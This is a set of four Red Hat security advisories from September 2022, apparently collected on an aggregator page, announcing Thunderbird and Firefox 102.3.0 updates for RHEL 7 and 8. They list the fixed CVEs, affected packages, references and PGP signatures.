Red Hat Security Advisory 2022-6707-01

Red Hat Security Advisory 2022-6708-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6708-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6708  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-3032 CVE-2022-3033 CVE-2022-3034   
                   CVE-2022-36059 CVE-2022-40956 CVE-2022-40957   
                   CVE-2022-40958 CVE-2022-40959 CVE-2022-40960   
                   CVE-2022-40962   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* Mozilla: Leaking of sensitive information when composing a response to an  
HTML email with a META refresh tag (CVE-2022-3033)

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Remote content specified in an HTML document that was nested  
inside an iframe's srcdoc attribute was not blocked (CVE-2022-3032)

* Mozilla: An iframe element in an HTML email could trigger a network  
request (CVE-2022-3034)

* Mozilla: Matrix SDK bundled with Thunderbird vulnerable to  
denial-of-service attack (CVE-2022-36059)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2123255 - CVE-2022-3032 Mozilla: Remote content specified in an HTML document that was nested inside an iframe's srcdoc attribute was not blocked  
2123256 - CVE-2022-3033 Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag  
2123257 - CVE-2022-3034 Mozilla: An iframe element in an HTML email could trigger a network request  
2123258 - CVE-2022-36059 Mozilla: Matrix SDK bundled with Thunderbird vulnerable to denial-of-service attack  
2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-102.3.0-3.el8_6.src.rpm

aarch64:  
thunderbird-102.3.0-3.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.aarch64.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.3.0-3.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.3.0-3.el8_6.s390x.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.s390x.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.s390x.rpm

x86_64:  
thunderbird-102.3.0-3.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_6.x86_64.rpm  
thunderbird-debugsource-102.3.0-3.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3032  
https://access.redhat.com/security/cve/CVE-2022-3033  
https://access.redhat.com/security/cve/CVE-2022-3034  
https://access.redhat.com/security/cve/CVE-2022-36059  
https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0TNzjgjWX9erEAQiB3RAAkahXHjRspQ+guIITh2rYcmBoQL3GvQZd  
XEI1V8Dk6rnjdt/+6FgYgfggr+73qIj/1/qGYoJofdAPLRUd1pvUTRixC+emHE+W  
iVgo/URHjOBqkMRmc4wUjLkb0xn/voirDTooLAx7opbhzT5FPRAEitGYUbWsI7l2  
9r2f7CJS4sYu/PA3bEm0I+EJDNAHZuL9+9mmbRQNNHT/vwT9R66jdqoZY8wbpvL6  
T899ruuHWEuorCvhsdBsL2BHPxYDQFASlKvkXppPQFjNy09GvmfgbSci//Foy3Uf  
1Sl22PV6QxI+haIg/SWhzrFUQRQpfRtrn5v8Y47yRiqXsat0Zpgn7xcLey/fW4Kj  
rchBJXtvm4lQZwow7Dim/6YdLXsXl0btf9VuV5275qOm5ywYYzUg/f5bDSDLY7Cu  
lfsFo1AybY9TYnzGhL7bTrKZuW/jMHa8T2ftD3LhTudG+VOO2zBepXR1/bH7SYUE  
jndbovr8vpws34oQsSUeTKsd/u9jUJ683IG3G875BmtcxfnA7fBDy8yZ3SB1l+2Q  
8AobvEi/5c+zcXoUirub3X+fxEA/VKjwHUNEYLif3p8DVBNiCTQot1KHHbTxGgKf  
1vMEOdptvYDiZm8l0AZOag/Ew1Fc2PZIhI8JBoDWPc/JNqxSz6V0pzNi0iEGLJL+  
rbfDeg3UhFQ=  
=Gluw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6708-01

Red Hat Security Advisory 2022-6710-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6710-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6710  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-3032 CVE-2022-3033 CVE-2022-3034   
                   CVE-2022-36059 CVE-2022-40956 CVE-2022-40957   
                   CVE-2022-40958 CVE-2022-40959 CVE-2022-40960   
                   CVE-2022-40962   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* Mozilla: Leaking of sensitive information when composing a response to an  
HTML email with a META refresh tag (CVE-2022-3033)

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Remote content specified in an HTML document that was nested  
inside an iframe's srcdoc attribute was not blocked (CVE-2022-3032)

* Mozilla: An iframe element in an HTML email could trigger a network  
request (CVE-2022-3034)

* Mozilla: Matrix SDK bundled with Thunderbird vulnerable to  
denial-of-service attack (CVE-2022-36059)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2123255 - CVE-2022-3032 Mozilla: Remote content specified in an HTML document that was nested inside an iframe's srcdoc attribute was not blocked  
2123256 - CVE-2022-3033 Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag  
2123257 - CVE-2022-3034 Mozilla: An iframe element in an HTML email could trigger a network request  
2123258 - CVE-2022-36059 Mozilla: Matrix SDK bundled with Thunderbird vulnerable to denial-of-service attack  
2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
thunderbird-102.3.0-3.el7_9.src.rpm

x86_64:  
thunderbird-102.3.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
thunderbird-102.3.0-3.el7_9.src.rpm

ppc64le:  
thunderbird-102.3.0-3.el7_9.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.ppc64le.rpm

x86_64:  
thunderbird-102.3.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
thunderbird-102.3.0-3.el7_9.src.rpm

x86_64:  
thunderbird-102.3.0-3.el7_9.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3032  
https://access.redhat.com/security/cve/CVE-2022-3033  
https://access.redhat.com/security/cve/CVE-2022-3034  
https://access.redhat.com/security/cve/CVE-2022-36059  
https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0QtzjgjWX9erEAQjJ/g/8DhFo8FzyNIYAclnV2nX0os649M45iqF+  
kHbnTz7+YvxlY4U7GI7CL/Fxa8spHH3gOjKEsj602MnZ/R3jC422YuLTcIhlQx+o  
B4q1Knfr3ZPLY9rsSB4u6TbtjEC0paNNBfzKahLcZ1OorBXiARf7FaAfBBTCgtM0  
XWivpKkESba4svLKhSioFN3aX75ws8vj0K3eeraPE9+/IBrqgCj4Tj9Te0oL1tGO  
6rDx0t35EeXFCwUurvO5upx3eMzQFTzIqAGQFgdKj6Yfhe6nIE0TSC+eJw237+Ai  
wOZpenjQfWijve/bGuNk/+XB6/KtYcdaMU7NO6VwfxvawmqwbTkkXU3PpU5jxl47  
5f88goZJqB0FPrnU6kB6mqNo2pMHdUs00WcIp0XCrC0XEMYQ+BCH2mAnNfWhcl1O  
mJNdaeYBeWhfE8j6n8khImBOarQISomVwfBk0a/r0gdZlrTEVH68kLC4UkpL9//n  
aH4DqXSeseg4jBTt8+YAVp2iLRJRAHSWtXZW4G4Erhnd2XI80rNd+C69Aznv/UcJ  
+UIwFXZS701yju9wl0sdAIYpcskUphrUchvZgiolbX8wwPHN36O0U1dBRyqM835J  
nv5Vtf9eycdfwHZy0vEyIo8HG7gz7hG+E4MUEzsPP3yov1j7RJNKt8vTWbyxCg0U  
rrW/j52Y4QM=  
=gF6E  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6710-01

Red Hat Security Advisory 2022-6711-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6711-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6711  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.3.0-6.el7_9.src.rpm

x86_64:  
firefox-102.3.0-6.el7_9.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.3.0-6.el7_9.i686.rpm  
firefox-debuginfo-102.3.0-6.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.3.0-6.el7_9.src.rpm

ppc64:  
firefox-102.3.0-6.el7_9.ppc64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.ppc64.rpm

ppc64le:  
firefox-102.3.0-6.el7_9.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el7_9.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el7_9.s390x.rpm  
firefox-debuginfo-102.3.0-6.el7_9.s390x.rpm

x86_64:  
firefox-102.3.0-6.el7_9.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.3.0-6.el7_9.i686.rpm  
firefox-debuginfo-102.3.0-6.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.3.0-6.el7_9.src.rpm

x86_64:  
firefox-102.3.0-6.el7_9.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.3.0-6.el7_9.i686.rpm  
firefox-debuginfo-102.3.0-6.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0N9zjgjWX9erEAQiAwg//X0LKGgOodugK6kITzPEX6kret9uH7Nd6  
eWOYy6LlObGhfm89Fo7oaUy+j2B6a1+8fou0wnp2zCDmKHfvj/M4NatO4PamXA90  
BykutKi0zZ/HtAWymmQzlp8unXSqolUB6m0QhsIFBdfbK1czpbRxUh2jPu2Ta5+W  
ajb2TNcG85Oo54QwGQ1ZEzqd2nkqmk2lIipy9xtgINrtOy8C0s9Cw6sPbn1RXmd7  
n804j9USNLV/vEVMUjUBI+NB6RAzJvZ5j7ECy8pTQsLdUOjGIS5FT8sC7ea92qXS  
IVfuv4oeY4LMMQJKZ0AekdMGnrLFh7RXoWBZkTPa64skrDAOG4b7Mp8fGMrZeJS6  
mIf4ZfxiTjHXLgbwfQLoo5RCPVOrKmdgNzKN3ZPfDtY54kRuOOR0Q8tS9mo+ktb4  
G+3N8uBUiEKw+Sd9qV/OKoEaV39YcE9+P0t2EAj6EzYXgKMZNH46HcBBwRcRQ8sF  
gSdbvSGgazHyCkckOZRzSbhj6M8HOqOQiVbL/uInw8V9IRs7PwSa9rc4QY7LEDLF  
nliD6kQ0NbYz7vdVRRqlawvXZrfpj3M0/kMCgvDsDDd6VFnr0qPugLYZvm2HMNL5  
zhCdXDMNpxH7ezWICJ9vFU5m8o7dohHWBS2vnyogIcaYDZ4CBao8vTDC49VaD9GZ  
NQ6pu/VK9bU=  
=5O5C  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6711-01

Red Hat Security Advisory 2022-6713-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.3.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6713-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6713  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-3032 CVE-2022-3033 CVE-2022-3034   
                   CVE-2022-36059 CVE-2022-40956 CVE-2022-40957   
                   CVE-2022-40958 CVE-2022-40959 CVE-2022-40960   
                   CVE-2022-40962   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.3.0.

Security Fix(es):

* Mozilla: Leaking of sensitive information when composing a response to an  
HTML email with a META refresh tag (CVE-2022-3033)

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Remote content specified in an HTML document that was nested  
inside an iframe's srcdoc attribute was not blocked (CVE-2022-3032)

* Mozilla: An iframe element in an HTML email could trigger a network  
request (CVE-2022-3034)

* Mozilla: Matrix SDK bundled with Thunderbird vulnerable to  
denial-of-service attack (CVE-2022-36059)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2123255 - CVE-2022-3032 Mozilla: Remote content specified in an HTML document that was nested inside an iframe's srcdoc attribute was not blocked  
2123256 - CVE-2022-3033 Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag  
2123257 - CVE-2022-3034 Mozilla: An iframe element in an HTML email could trigger a network request  
2123258 - CVE-2022-36059 Mozilla: Matrix SDK bundled with Thunderbird vulnerable to denial-of-service attack  
2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
thunderbird-102.3.0-3.el8_4.src.rpm

aarch64:  
thunderbird-102.3.0-3.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.aarch64.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.3.0-3.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.3.0-3.el8_4.s390x.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.s390x.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.s390x.rpm

x86_64:  
thunderbird-102.3.0-3.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.3.0-3.el8_4.x86_64.rpm  
thunderbird-debugsource-102.3.0-3.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3032  
https://access.redhat.com/security/cve/CVE-2022-3033  
https://access.redhat.com/security/cve/CVE-2022-3034  
https://access.redhat.com/security/cve/CVE-2022-36059  
https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0LtzjgjWX9erEAQjkww//aB0FxGjWJ+ep1n3d5H7rcazn5Yk1gbxt  
EBpgmmL/JeX0KgrqLyVz2SiaY52njGg064SjOCYnAfJovIVIp26xFX0FMY2sc844  
xBgW/KE130rr7JOZhARvZyaLyqusKgC56NdN0tNw30mgR4DGwhkv4Ihiodzub376  
NponjXM+i/hZnD8xEL+bz8g+DDB/pda2nvsyITqxXcGhJomnTd1ovZvjLbcrV+XP  
JHE5G5Ln0+VmXXT9VSNx0q4y6OqPEMCaX0tbLIgJH1nYSLAKqGi9KSCru6gYa+/A  
vP+a6F4dcvhNEntNLCVOjYiyELF0PR2Ofe5SOzt+ole7igA4zvhXo0xVGh/i3wHI  
Fff3j+zqqeWyvsuo9jh+7b3hxL0Rn8WvSwutrR1bwrobC5HvMACADeQ7dSKNwwR5  
h7GbEFTKj0C2YZGY12AfKd2q9+0nZYdyATZsofX/SZ4YW9xI1kiCiF1BcbnOtP67  
v2nRvnwPS6VlECkbDQA2fBB/kjwoRZiO1wix+dGIeBYzfLFI/EXikmQSg7iGvb1t  
vjnaX7W6J1/pDIrt4xGNuUs/yaEMMUHRIvt4TSCiOuVljZUgNA9MbZ9DWl8q4WBD  
/GjDi4xOJSHX2lDL3DkC1Ie0mKsB1Pl9GGT+HTAHPFsmEA3pTjFtA+7lay8/9Jcn  
ATDPcvn3yiI=  
=xfpu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox